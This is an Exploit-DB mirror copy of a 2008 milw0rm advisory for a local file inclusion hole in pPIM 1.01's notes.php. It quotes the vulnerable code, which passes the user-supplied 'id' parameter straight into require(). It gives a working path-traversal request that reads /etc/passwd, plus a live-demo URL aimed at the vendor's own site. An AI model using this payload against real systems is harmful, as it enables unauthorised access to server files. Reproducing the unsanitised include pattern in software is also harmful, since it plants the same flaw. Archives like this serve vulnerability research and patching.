exploit-db-mirror/exploits/php/webapps/6667.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

65 lines
No EOL
1.2 KiB
Text

# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# url: http://www.phlatline.org/docs/files/ppim.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
description of vulnerability:
-----------------------------------------------
the variable 'id' has been not defined in code
and the variable 'id' is sent by the users.
-----------------------------------------------
vuln file: notes.php
vuln code:
x: >...
107: if (isset($_GET["mode"]))
{
if ($_GET["mode"]=="edit")
{
if (isset($_GET['id']))
{
$notefile = $_GET['id'];
if ($notefile == "new")
{
$title = "";
$notes = "";
}
else
{
$temp = "notes/" . $notefile;
require($temp);
123: }
x: <...
x: }}}
exploit: GET /notes.php?mode=edit&id=[file]
sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd
live demo:
http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php
# milw0rm.com [2008-10-04]